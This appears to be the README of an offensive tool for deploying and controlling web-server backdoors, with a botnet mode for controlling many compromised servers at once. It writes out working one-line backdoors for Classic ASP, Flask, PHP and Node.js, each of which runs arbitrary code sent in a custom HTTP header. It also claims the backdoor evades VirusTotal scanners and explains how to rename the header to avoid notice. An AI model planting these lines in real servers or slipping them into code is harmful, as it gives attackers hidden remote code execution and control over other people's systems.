This tool allows you to deploy and exploit backdoors with one line of code in Classic ASP, Flask, NodeJS, and PHP servers.
As of April 9, 2024, the backdoor is not detected by any of the malware scanners on VirusTotal.
Custom extensions can be created and installed to control any backdoored server.
Install the prerequisites with pip install -r requirement.txt in the src folder.
If you're on Windows, run pip install -r windows_requirements.txt.
The controller runs on Python. To start, run main.py in the src folder.
Type help to list all commands in the current shell. Changes depending on whether or not you've entered a botnet or exploit shell.
To control multiple backdoors at once, run botnet outside of an exploit shell to enter the botnet mode.
Load extensions using the loadext command before entering an exploit shell.
Run help loadext for more details.
To make a custom exploit/extension, create a Python module containing a class/classes that extends the ExploitProcessor class.
View the PHPExploitProcessor in the src folder for an example of the implementation.
Use the create_backdoor.sh script to generate the one line backdoor. The following is for reference.
Add the following line to the top of the file you want to have the backdoor
<% If request.servervariables("EXPLOIT") <> "" Then:execute(request.servervariables("EXPLOIT")):response.end:End If %>
Add the following line to the top of the endpoint you want to have the backdoor
if request.headers.get('EXPLOIT'): global r;exec(__import__('base64').b64decode(request.headers.get('EXPLOIT').encode()).decode());return r;
Add the following line to the top of the endpoint you want to have the backdoor
isset($_SERVER["HTTP_EXPLOIT"]) and eval($_SERVER["HTTP_EXPLOIT"]);
Add the following line to the endpoint you want to have the backdoor
if (req.headers?.exploit) return (eval('let r=res;let i=req;'+req.headers?.exploit));
Replace res with the ServerResponse parameter name, and replace req with the IncomingRequest parameter name.
Only works if fs and { execSync } from 'child_process is imported.
So in some cases, the backdoor may technically be up to three lines.
Any area where EXPLOIT or exploit is referenced can be replaced with any custom HTTP header (eg. for PHP, HTTP_EXPLOIT -> HTTP_ANYTHINGYOUWANT).
Any help in this project would be appreciated, and feel free to make pull requests for any custom extensions you create.
This repository was inspired by PHPSPLOIT.